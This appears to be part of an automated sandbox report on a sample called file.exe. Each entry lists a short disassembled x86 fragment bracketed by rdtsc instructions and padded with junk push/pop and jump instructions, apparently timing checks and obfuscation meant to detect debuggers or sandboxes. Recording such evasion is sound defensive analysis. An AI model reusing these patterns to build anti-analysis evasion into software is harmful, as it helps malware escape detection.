          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A453C second address: 11A457D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F4F28CDCB70h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F4F28CDCB73h 0x00000012 jnp 00007F4F28CDCB6Ch 0x00000018 popad 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A4FD2 second address: 11A4FDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F4F296427A6h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A4FDC second address: 11A5060 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F4F28CDCB75h 0x0000000e nop 0x0000000f mov dword ptr [ebp+122D1C8Dh], edx 0x00000015 lea eax, dword ptr [ebp+12488954h] 0x0000001b mov dx, si 0x0000001e push eax 0x0000001f jmp 00007F4F28CDCB6Ah 0x00000024 mov dword ptr [esp], eax 0x00000027 push 00000000h 0x00000029 push ecx 0x0000002a call 00007F4F28CDCB68h 0x0000002f pop ecx 0x00000030 mov dword ptr [esp+04h], ecx 0x00000034 add dword ptr [esp+04h], 00000018h 0x0000003c inc ecx 0x0000003d push ecx 0x0000003e ret 0x0000003f pop ecx 0x00000040 ret 0x00000041 and dx, 9351h 0x00000046 lea eax, dword ptr [ebp+12488910h] 0x0000004c mov dword ptr [ebp+124600FAh], eax 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 push esi 0x00000056 jmp 00007F4F28CDCB72h 0x0000005b pop esi 0x0000005c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E5015 second address: 11E5023 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jng 00007F4F296427A6h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E5023 second address: 11E5027 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E576C second address: 11E5770 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E9ED9 second address: 11E9EFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4F28CDCB79h 0x00000009 pop ecx 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E96EC second address: 11E96F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E96F5 second address: 11E96F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E96F9 second address: 11E96FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E9820 second address: 11E9834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4F28CDCB6Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E9834 second address: 11E984F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F4F296427ACh 0x0000000b jnc 00007F4F296427A6h 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push edi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E984F second address: 11E9854 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1163C3D second address: 1163C4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jo 00007F4F296427A8h 0x0000000c push edi 0x0000000d pop edi 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EC0B0 second address: 11EC0C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F28CDCB6Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F0A43 second address: 11F0A48 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F0A48 second address: 11F0A4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F0A4E second address: 11F0A68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F4F296427ADh 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F0A68 second address: 11F0A6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F0A6C second address: 11F0A70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F0A70 second address: 11F0A7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F4F28CDCB66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F0BF1 second address: 11F0C06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4F296427B1h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F0C06 second address: 11F0C10 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4F28CDCB66h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F0C10 second address: 11F0C27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F4F296427AEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F0D7D second address: 11F0D81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F0D81 second address: 11F0D92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F4F296427A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F0D92 second address: 11F0D9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F4F28CDCB66h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115CFDA second address: 115CFDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115CFDE second address: 115CFE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FB227 second address: 11FB24A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F4F296427B2h 0x0000000c jmp 00007F4F296427AAh 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F9D00 second address: 11F9D06 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F9D06 second address: 11F9D0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F9D0F second address: 11F9D24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 popad 0x0000000a ja 00007F4F28CDCB8Fh 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F9E75 second address: 11F9E7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F9E7A second address: 11F9E8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F4F28CDCB66h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push ecx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A49B6 second address: 11A49DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F296427B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4F296427AEh 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A49DA second address: 11A4A1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a jmp 00007F4F28CDCB71h 0x0000000f mov ebx, dword ptr [ebp+1248894Fh] 0x00000015 mov dx, F487h 0x00000019 add eax, ebx 0x0000001b clc 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jl 00007F4F28CDCB79h 0x00000025 jmp 00007F4F28CDCB73h 0x0000002a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FA39C second address: 11FA3A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FA3A2 second address: 11FA3A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FA4FC second address: 11FA504 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FA504 second address: 11FA509 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114F6EF second address: 114F6F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114F6F3 second address: 114F6FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114F6FD second address: 114F701 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1202021 second address: 1202029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120244B second address: 120244F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120244F second address: 1202464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b jo 00007F4F28CDCB66h 0x00000011 popad 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1202464 second address: 1202495 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4F296427B7h 0x00000009 pop edi 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007F4F296427B0h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1202495 second address: 120249E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120249E second address: 12024A4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1202759 second address: 1202764 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1202764 second address: 1202768 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1202A07 second address: 1202A0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1202D08 second address: 1202D0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1207E98 second address: 1207E9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1207E9C second address: 1207EA6 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4F296427A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12074D0 second address: 12074F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F4F28CDCB6Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007F4F28CDCB6Bh 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12074F3 second address: 12074F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120796F second address: 1207997 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F28CDCB76h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007F4F28CDCB66h 0x00000011 jnl 00007F4F28CDCB66h 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1207ADE second address: 1207AE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1213128 second address: 1213136 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1213F0C second address: 1213F10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1213F10 second address: 1213F1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1213F1A second address: 1213F1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12145E4 second address: 1214608 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ebx 0x0000000c jmp 00007F4F28CDCB73h 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1214D9E second address: 1214DA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121EEDE second address: 121EEE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121EEE2 second address: 121EF07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F4F296427A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F4F296427B6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121EF07 second address: 121EF0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121EF0D second address: 121EF20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F4F296427A6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007F4F296427A6h 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121EF20 second address: 121EF26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114DA75 second address: 114DA7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114DA7B second address: 114DA88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pop esi 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114DA88 second address: 114DAC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jno 00007F4F296427B8h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F4F296427B9h 0x00000014 jnl 00007F4F296427A6h 0x0000001a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114DAC8 second address: 114DACC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114DACC second address: 114DAD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114DAD2 second address: 114DADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1229DC2 second address: 1229DC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1229F73 second address: 1229F8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F4F28CDCB6Dh 0x0000000a popad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1229F8B second address: 1229F95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F4F296427A6h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11598EA second address: 11598F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11598F1 second address: 11598F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11598F7 second address: 11598FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122F4AA second address: 122F4B8 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4F296427A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122EF5A second address: 122EF69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 jng 00007F4F28CDCB66h 0x0000000e popad 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122EF69 second address: 122EF9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F296427B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c jmp 00007F4F296427B8h 0x00000011 pop eax 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122EF9B second address: 122EFA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122EFA1 second address: 122EFBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F296427B9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115EA9E second address: 115EAA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F4F28CDCB66h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12380D6 second address: 12380DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12380DA second address: 12380E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12380E0 second address: 12380FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4F296427B4h 0x00000009 jc 00007F4F296427A6h 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12380FE second address: 1238102 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12436D9 second address: 12436EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push edi 0x00000008 jmp 00007F4F296427AAh 0x0000000d pop edi 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12436EC second address: 12436F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124C26E second address: 124C274 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124C274 second address: 124C285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jng 00007F4F28CDCB6Ch 0x0000000b jne 00007F4F28CDCB66h 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124C285 second address: 124C28B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124ADE5 second address: 124ADE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
